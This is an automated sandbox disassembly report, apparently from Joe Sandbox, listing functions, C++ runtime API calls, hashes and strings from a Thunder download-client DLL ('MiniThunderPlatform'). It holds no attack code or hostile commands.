                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??1?$basic_string@$??$?6D@std@@@0@V10@V?$basic_ostream@$??0?$basic_stringstream@??6?$basic_ostream@?sputc@?$basic_streambuf@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@V01@V?$basic_string@$??0?$basic_string@$?clear@ios_base@std@@H_prologV01@@_ui64toa
                                                                                                                                              • String ID: no: $ range length: $ read notify failure, and file length unknown, exit$ read notify failure, and not support range, exit$ read notify failure, reopen range pos:
                                                                                                                                              • API String ID: 2205180056-194739534
                                                                                                                                              • Opcode ID: 06e8264eb31df044fae4eab9aba1831b8ff51da6a13d1074438867e2c9e8eb4f
                                                                                                                                              • Instruction ID: 0fffe3696d969b99f903fee756cdb99bbd2b6ed69ab5727694b2e0f5ca4631fe
                                                                                                                                              • Opcode Fuzzy Hash: 06e8264eb31df044fae4eab9aba1831b8ff51da6a13d1074438867e2c9e8eb4f
                                                                                                                                              • Instruction Fuzzy Hash: A2C15B342043809FD325DB64C899FDBBBE8EF99704F004A5DF59E97291DB706648CB62
                                                                                                                                              Function 100D1095 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 212COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100D109A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(7C3D2C5E,?,?), ref: 100D10BD
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D10CA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D10DA
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D1150
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1160
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1170
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1180
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D118D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D119A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(content-length), ref: 100D11AB
                                                                                                                                                • Part of subcall function 1007A7B0: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 1007A7CD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D11D5
                                                                                                                                              • sprintf.MSVCR71(?,%ld,?), ref: 100D11EF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100D11FF
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D1213
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1220
                                                                                                                                              • sprintf.MSVCR71(?,%ld,?), ref: 100D1239
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100D124B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Content-Length), ref: 100D1268
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D12EE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D12FB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1308
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D1318
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10277F04), ref: 100D1335
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100D134D
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100D135D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D136D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V12@V12@@$?append@?$basic_string@V01@@$H_prolog$?assign@?$basic_string@V01@Y?$basic_string@sprintf$??$?D@1@@std@@D@2@@0@0@V?$basic_string@
                                                                                                                                              • String ID: %ld$Content-Length$content-length
                                                                                                                                              • API String ID: 2683903078-440850701
                                                                                                                                              • Opcode ID: e9ccd2b126e8ab8df9e1b197a2187095da685965ad467a779a6d8772345b76cb
                                                                                                                                              • Instruction ID: 29cadb685a180891815890d3241a25604a1ea077815c204bad2ae347f82859cc
                                                                                                                                              • Opcode Fuzzy Hash: e9ccd2b126e8ab8df9e1b197a2187095da685965ad467a779a6d8772345b76cb
                                                                                                                                              • Instruction Fuzzy Hash: 9B912071900218EFDB14DBA4CD4DBDEBBB8FF19354F108299E05AA3291DB746A49CF21
                                                                                                                                              Function 10091140 Relevance: 51.2, APIs: 26, Strings: 3, Instructions: 445COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100911AD
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71 ref: 1009125A
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,1027B190), ref: 10091269
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,1027B190), ref: 1009126F
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,1027B190), ref: 10091275
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,1027B190), ref: 1009127B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,?,1027B190), ref: 10091281
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,1027B190), ref: 10091287
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1009128D
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 10091294
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 1009129B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100912A1
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100912A8
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100912AF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100912C3
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100912D2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009131F
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 10091334
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100913B9
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100913CE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100913E5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100913F2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100914C0
                                                                                                                                                • Part of subcall function 1000F1E0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,00000001,?,?,?,?,?,?,?,?,1001DF35,?,?,?,?), ref: 1000F2EE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 10091536
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009154F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10091569
                                                                                                                                                • Part of subcall function 100BF990: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(channel_p2s,00000000,?), ref: 100BF9CE
                                                                                                                                                • Part of subcall function 100BF990: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100BF9E5
                                                                                                                                                • Part of subcall function 100BF990: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000001), ref: 100BFA18
                                                                                                                                                • Part of subcall function 100BF990: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100BFA2A
                                                                                                                                                • Part of subcall function 100BF990: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100BFA45
                                                                                                                                                • Part of subcall function 100BF990: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100BFA73
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6D@std@@@0@V10@V?$basic_ostream@$??1?$basic_string@$??0?$basic_string@?assign@?$basic_string@V12@$??6?$basic_ostream@V01@V12@@$??0?$basic_stringstream@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@V01@@V?$basic_string@
                                                                                                                                              • String ID: ], BCID[$], CID[$], GCID[
                                                                                                                                              • API String ID: 650295696-684904080
                                                                                                                                              • Opcode ID: 39e23349b43f2c2581febb21b0ad97b9af65912229fd3abd6f0792191a724e54
                                                                                                                                              • Instruction ID: fd50a294b59ff539e2c903660c27b6b522f020c879bcc2257fc0678467fc2944
                                                                                                                                              • Opcode Fuzzy Hash: 39e23349b43f2c2581febb21b0ad97b9af65912229fd3abd6f0792191a724e54
                                                                                                                                              • Instruction Fuzzy Hash: 83027C74A083849BCB74CF24CC94BDE77E9EF99744F04851DE98D9B281CB30A944CBA2
                                                                                                                                              Function 1001163A Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 149COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001163F
                                                                                                                                                • Part of subcall function 10010DB7: wcsrchr.MSVCR71(?,0000005C,00000000,?,10011661,?,?), ref: 10010DCD
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?,7C363127,10311990,00000104,100113A3,?,00000104,uuid), ref: 10010F97
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?), ref: 10010F9F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?,?), ref: 10011688
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?,?,?), ref: 10011699
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102780D8,?,?,?), ref: 100116AE
                                                                                                                                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@XZ.MSVCP71(00000001,?,?,?), ref: 100116C0
                                                                                                                                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP71(?,?,?), ref: 100116D0
                                                                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,?,?), ref: 100116F6
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              • ?open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXPBDHH@Z.MSVCP71(-00000004,00000001,000001B6,?,?,?), ref: 10011731
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?), ref: 10011741
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,?,?), ref: 10011798
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(102780D4,00000000,?), ref: 100117B1
                                                                                                                                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000001,00000001), ref: 100117CC
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100117DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 100117ED
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102780D0), ref: 100117FF
                                                                                                                                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP71(?), ref: 1001181C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001182C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001183C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001184C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@std@@@std@@$wcslen$D@1@@std@@D@2@@0@V12@V?$basic_string@$??$?8??$?9??0?$basic_ifstream@?assign@?$basic_string@?clear@ios_base@std@@?close@?$basic_ifstream@?find@?$basic_string@?open@?$basic_ifstream@?substr@?$basic_string@ByteCharD?$basic_ifstream@H_prologMultiV12@@Widememsetwcsrchr
                                                                                                                                              • String ID: auto_test.cfg
                                                                                                                                              • API String ID: 1472417827-964236144
                                                                                                                                              • Opcode ID: e3a4b0ea4493ef759f06e1d8578ec9e22e1217940296261373955dc326bfe3e2
                                                                                                                                              • Instruction ID: 7b25f88155c44d0fd4f5c05a5292803ce71c897a17d4b5947443901596552a7f
                                                                                                                                              • Opcode Fuzzy Hash: e3a4b0ea4493ef759f06e1d8578ec9e22e1217940296261373955dc326bfe3e2
                                                                                                                                              • Instruction Fuzzy Hash: EC5150359052299FDB25DB60CC8DBDDB7B8EF28305F5041D8E40AA3191DB74AB88CF50
                                                                                                                                              Function 10090090 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 227COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 100901B2
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 100901D7
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 100901FC
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 10090221
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 10090246
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,000000FF,10090EA8), ref: 10090257
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 10090274
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090281
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 10090298
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100902A5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100902B6
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100902C8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090317
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090328
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090343
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10090354
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??3@$??0?$basic_string@CriticalDeleteSection$H_prologV01@@
                                                                                                                                              • String ID: .\p2sp_sub_task_imp.cpp$STATE_IDLE == _ctrl_state$thunder_assert
                                                                                                                                              • API String ID: 929414334-39187018
                                                                                                                                              • Opcode ID: 8e2be318c9684b4316a1b911a65de8b619d5b692ef1142173b12251e54afa213
                                                                                                                                              • Instruction ID: f817509184bc61a1055603f2aee733fe2f42312bee805cd1bd6ba3cc85fa90d7
                                                                                                                                              • Opcode Fuzzy Hash: 8e2be318c9684b4316a1b911a65de8b619d5b692ef1142173b12251e54afa213
                                                                                                                                              • Instruction Fuzzy Hash: 7BA158745047818FD720CF69C888A9ABBE4FF59304F50896DE0AF87652CB74B989CF52
                                                                                                                                              Function 10018301 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 176COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10018306
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,fs.dll), ref: 10018320
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,p2sp.dll), ref: 10018350
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              Strings
